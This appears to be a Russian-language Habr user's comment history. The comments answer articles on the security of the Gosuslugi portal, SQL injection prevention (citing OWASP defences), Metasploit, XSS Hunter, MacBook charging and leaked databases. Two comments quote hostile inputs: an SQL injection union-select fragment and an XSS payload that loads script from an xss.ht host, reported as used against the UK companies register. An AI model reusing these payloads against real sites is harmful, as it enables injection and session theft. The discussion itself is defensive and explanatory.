Взлом госуслуг: мифы и реальность

Описанные кем? Про внедрение js и компрометацию third-party сервисов тоже прекрасно понимаю, например почти весь js тянется с gu-st.ru и т.д., но статья не претендует объять необъятное и никто мне не платил (хотя выше в каментах свечку держали) ни за написание, ни за полноценный аудит приложения и смежных сервисов.

Взлом госуслуг: мифы и реальность

На самом деле интереснее даже не само приложение "госуслуг", а новое - "госключ", но их анализ выходит за рамки этой статьи.

Взлом госуслуг: мифы и реальность

Вероятность уязвимостей конечно есть, но она компенсируется СЗИ/средствами мониторинга. В качестве рекомендаций я указал на возможность использования Bug Bounty программы для выявления уязвимостей, это даст дополнительную возможность выявлять баги.

Про утечку данных через сотрудника - я скорее поверю в локальную утечку через какой-нибудь МФЦ, нежели через госпортал. О внутренней утечке существуют только ничем и никак не подтвержденные слухи.

Взлом госуслуг: мифы и реальность

Стоимость аккаунта будет слишком дорогой, проще купить готовые/с фишинга.

Взлом госуслуг: мифы и реальность

Я имел ввиду массовые продажи, единичные аккаунты продаются даже в мессенджере, вы правы.

«Яндекс» открыл доступ пользователям к инструменту для управления своими данными и их удаления

Сходу получаю ошибку: Превышено количество попыток подтверждения номера телефона. Попробуйте еще раз позже.

Вы пользуетесь уязвимым софтом, но я вам не могу об этом рассказать

Скоро на Bug Bounty Ru, пока можете написать на info@bugbounty.ru.

SQL-инъекции' union select null,null,null --

На уровне базы данных могут не поддерживаются привязанные переменные, поэтому необходимо использовать другие варианты.

Вот примеры с PHP: www.php.net/manual/ru/security.database.sql-injection.php

SQL-инъекции' union select null,null,null --

способов предотвращения SQL-инъекций два:
• не использовать динамические запросы к базе;
• не использовать пользовательские данные.

Учите матчасть:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense

cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Что такое Metasploit? Руководство для начинающих

NOP служат для «обхода» антивирусных средств, но это уже устаревшая техника.

Установка XSS Hunter

Зачем тогда разворачивать собственный сервис для этой задачи, спросите вы.

0. Чтобы не нарушать NDA и не кидать данные по пентесту направо налево.

Что такое Metasploit? Руководство для начинающих

Остановил чтение здесь:

В британском реестре компаний обнаружили XSS

При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:

"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>

Как заряжать макбук

Ссылка в посте есть, информация многим может быть полезна, чего-то еще высасывать из пальца нет смысла. Можно было бы обойтись двумя строками текста, но хабр не твиттер.

Как заряжать макбук

Верхний.

Как заряжать макбук

Для версий Mac Book Pro без тачбара с двумя портами слева — зарядку необходимо использовать в верхнем порту.

Как заряжать макбук

а мужики-то не знают.

В даркнет утекла база данных проголосовавших по поправкам в Конституцию на 1,1 миллиона записей

Такую «базу» можно и нагенерить, она содержит записи типа ХХ ХХ ХХХХХХ. В подарок купившему дают базу ALL CREDIT CARD PIN CODES IN THE WORLD LEAKED.

Обнаружена опаснейшая уязвимость в Windows DNS Server

Исправил, спасибо!

В сети продают базу с данными 5 млн студентов и сотрудников Skyeng за 40 тысяч рублей

Ага, дело не монге, но пароли в «вашей» бд вы храните (хранили в 2019) plaintext’ом. Теперь поинт вызвал доверие?